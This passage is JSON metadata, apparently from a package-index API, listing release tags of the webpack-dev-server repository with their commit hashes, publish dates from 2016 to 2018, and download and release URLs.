ind":"tag","published_at":"2018-02-27T21:04:31.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v3.1.0","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.1.0/manifests"},{"name":"v3.0.1-beta.0","sha":"f76182c981f78f9f0ef667615f4492a833f3e7ae","kind":"tag","published_at":"2018-02-26T20:59:44.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v3.0.1-beta.0","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v3.0.1-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.0.1-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.0.1-beta.0/manifests"},{"name":"v2.11.2","sha":"f33be5bc150b732b6bb8cc6d3a285f441d80cfb8","kind":"tag","published_at":"2018-02-26T20:19:38.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v2.11.2","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v2.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.11.2/manifests"},{"name":"v3.0.0","sha":"6e1d886d30bc8067067d33ba85c2ed810a4d1e2c","kind":"tag","published_at":"2018-02-25T11:14:59.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v3.0.0","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.0.0/manifests"},{"name":"v3.0.0-beta.2","sha":"398c773a54974c7f8317f181c31bbfd84c4e76aa","kind":"tag","published_at":"2018-02-17T10:45:44.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v3.0.0-beta.2","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v3.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.0.0-beta.2/manifests"},{"name":"v3.0.0-beta.1","sha":"9852a5fe47308d2f10d9f29b72f11796eec9d4a9","kind":"tag","published_at":"2018-02-14T22:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v3.0.0-beta.1","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v3.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.0.0-beta.1/manifests"},{"name":"v2.11.1","sha":"83c16251a16794b61fa22761d43b6450bfb18207","kind":"tag","published_at":"2018-01-20T21:08:53.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v2.11.1","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v2.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.11.1/manifests"},{"name":"v2.11.0","sha":"8c1ed7aad263f6a7b850e63cf945388ddac84441","kind":"tag","published_at":"2018-01-14T11:24:01.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v2.11.0","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v2.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.11.0/manifests"},{"name":"v2.10.1","sha":"3e220fe1c9dcdc7b688090f0f4661e06a1e87c91","kind":"tag","published_at":"2018-01-09T13:51:50.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v2.10.1","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v2.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.10.1/manifests"},{"name":"v2.10.0","sha":"ca8b5aa689220ce70d3fd6db8bfcfa62b1fa14f4","kind":"commit","published_at":"2018-01-06T02:53:10.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v2.10.0","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v2.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.10.0/manifests"},{"name":"v2.9.7","sha":"fd3c176d9a84c0e5e6d0ad579910ab0dccd3fe42","kind":"tag","published_at":"2017-12-07T03:41:07.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v2.9.7","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v2.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.9.7/manifests"},{"name":"v2.9.6","sha":"271959000b15a65b0f889cab4bb666e774455040","kind":"tag","published_at":"2017-12-06T03:53:40.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v2.9.6","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v2.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.9.6/manifests"},{"name":"v2.9.5","sha":"6c1d3e4a6cf692e97af44bae56f78bdbe920ee25","kind":"tag","published_at":"2017-11-27T16:46:14.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v2.9.5","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"77947be5de2a6e11e5d3e907ede15e1a0e94bdb1","kind":"tag","published_at":"2017-11-02T13:19:38.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v2.9.4","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"3d7285835bd4934b688ec9669b9712e72567f8cf","kind":"tag","published_at":"2017-10-20T01:29:29.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v2.9.3","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"32412bbbabd832ce1f1b6e0c9c8e53bc55875785","kind":"tag","published_at":"2017-10-15T13:55:31.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v2.9.2","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"97484a9cebad152e67b2fa5ca40058962295675c","kind":"tag","published_at":"2017-09-27T18:24:55.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v2.9.1","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"59828060699e64ceb1cce4ef69c6def441064abb","kind":"tag","published_at":"2017-09-27T13:52:20.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v2.9.0","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.9.0/manifests"},{"name":"v2.8.2","sha":"bc229352cde89eeb53e5d2e8501cbefb7e97b6c0","kind":"tag","published_at":"2017-09-14T19:27:15.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v2.8.2","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"e8cbdadd4e7632c1bbf4e6b683d485d254887d45","kind":"commit","published_at":"2017-09-13T19:16:33.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v2.8.1","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"0df1fa7e79be355f0418a099b21b7b3bac858189","kind":"tag","published_at":"2017-09-13T14:49:54.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v2.8.0","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.8.0/manifests"},{"name":"v2.7.1","sha":"0abc9af15c9c39a4fe33dbc3aa6a0116601e1de0","kind":"commit","published_at":"2017-08-08T18:09:29.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v2.7.1","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"62a46a56b276bd8b51577cb61cc0e9dadd0e29a7","kind":"tag","published_at":"2017-08-08T12:13:10.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v2.7.0","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.7.0/manifests"},{"name":"v2.6.1","sha":"09ffe239a889c22f13809e9c39478e92a4c69879","kind":"tag","published_at":"2017-07-23T09:58:52.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v2.6.1","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"adc9a0d28a4e4a27db18bb50d798530c45cbde78","kind":"tag","published_at":"2017-07-22T14:56:16.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v2.6.0","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"7c8b1f677f779c685e47ce32577ed4d888b7df9c","kind":"tag","published_at":"2017-07-07T05:53:49.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v2.5.1","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"bbcdca70dda70b4c6360435306c307a01ce32278","kind":"tag","published_at":"2017-06-20T06:32:49.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v2.5.0","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.5.0/manifests"},{"name":"v1.16.5","sha":"cc67bff22284c9663ace4271f2ddd0ee7bb4424d","kind":"tag","published_at":"2017-04-26T13:27:55.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v1.16.5","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v1.16.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v1.16.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v1.16.5/manifests"},{"name":"v2.4.5","sha":"662bc31a4fc44b6888b5a0baff9ee96fef049cdb","kind":"tag","published_at":"2017-04-26T13:16:45.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v2.4.5","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"7d08d1e02218e8a21c81aeb216834843955e766b","kind":"tag","published_at":"2017-04-23T11:30:46.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v2.4.4","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"ca93284ca7256097c2e7dd2737dd2239f6f10be9","kind":"tag","published_at":"2017-04-22T09:59:07.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v2.4.3","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.4.3/manifests"},{"name":"v1.16.4","sha":"da20bc241847f22d7d6ae105354794a7a923f015","kind":"tag","published_at":"2017-04-22T09:58:18.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v1.16.4","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v1.16.4/manifests"},{"name":"v2.4.2","sha":"60e47270860165d41fe4654d78aa2fee8dbdcdc1","kind":"tag","published_at":"2017-03-14T10:20:42.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v2.4.2","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.4.2/manifests"},{"name":"v2.4.1","sha":"50ab2f07d363ee1c30660b7c3f13cf2e100dcf82","kind":"tag","published_at":"2017-02-19T22:13:53.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v2.4.1","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"3f7c9f7303d2fab380f4178844d52ed361599a2a","kind":"tag","published_at":"2017-02-19T10:52:44.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v2.4.0","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.4.0/manifests"},{"name":"v2.3.0","sha":"04eafa56244b186ff370ee2a98511993bd4e3b48","kind":"tag","published_at":"2017-02-03T15:10:31.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v2.3.0","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.3.0/manifests"},{"name":"v1.16.3","sha":"22c34b218a6f4519f3844928f45623359d1642ba","kind":"tag","published_at":"2017-01-31T22:11:09.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v1.16.3","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v1.16.3/manifests"},{"name":"v2.2.1","sha":"aa989975ec628099cc32f5967d217f0d663e5618","kind":"tag","published_at":"2017-01-31T11:27:22.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v2.2.1","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"7e18f6a733162af022423db68a519b5186bdd6e4","kind":"tag","published_at":"2017-01-17T22:33:36.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v2.2.0","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.2.0/manifests"},{"name":"v2.2.0-rc.0","sha":"00bdcd5de0487ea31263c39abd748b2d6e190a31","kind":"tag","published_at":"2016-12-15T20:03:18.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v2.2.0-rc.0","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v2.2.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.2.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.2.0-rc.0/manifests"},{"name":"v2.1.0-beta.12","sha":"1f603090a7ddcb7bd439fda11a2a33dd86e95473","kind":"tag","published_at":"2016-11-25T09:47:11.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v2.1.0-beta.12","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v2.1.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.1.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.1.0-beta.12/manifests"},{"name":"v2.1.0-beta.11","sha":"a8743036b881e801dd5109466de45d56dbe97bc0","kind":"tag","published_at":"2016-11-14T11:32:13.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v2.1.0-beta.11","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v2.1.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.1.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.1.0-beta.11/manifests"},{"name":"v2.1.0-beta.10","sha":"af9c3712561effce0e4596806779531430b7c9e1","kind":"tag","published_at":"2016-10-29T14:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v2.1.0-beta.10","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v2.1.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.1.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.1.0-beta.10/manifests"},{"name":"v2.1.0-beta.9","sha":"b32174c272040918eb2a9d10d4c80d622d4b6f04","kind":"tag","published_at":"2016-10-11T19:08:54.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v2.1.0-beta.9","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v2.1.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.1.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.1.0-beta.9/manifests"},{"name":"v1.16.2","sha":"bf741ce8143dc61e3e946536d1b1b42d3ed16355","kind":"tag","published_at":"2016-10-06T09:12:23.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v1.16.2","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v1.16.2/manifests"},{"name":"v2.1.0-beta.8","sha":"ffb1e560d5cf14cc037db1ce1027c528599bc1f9","kind":"tag","published_at":"2016-10-01T09:17:46.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v2.1.0-beta.8","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v2.1.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.1.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.1.0-beta.8/manifests"},{"name":"v2.1.0-beta.7","sha":"d316d77dff02fc2be173b6d5b6ab3dac80cb9552","kind":"tag","published_at":"2016-09-27T13:44:44.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v2.1.0-beta.7","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v2.1.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.1.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.1.0-beta.7/manifests"},{"name":"v2.1.0-beta.6","sha":"6466363aab4c2b10e6073ef45c64ca081db6411b","kind":"tag","published_at":"2016-09-26T09:53:32.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v2.1.0-beta.6","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v2.1.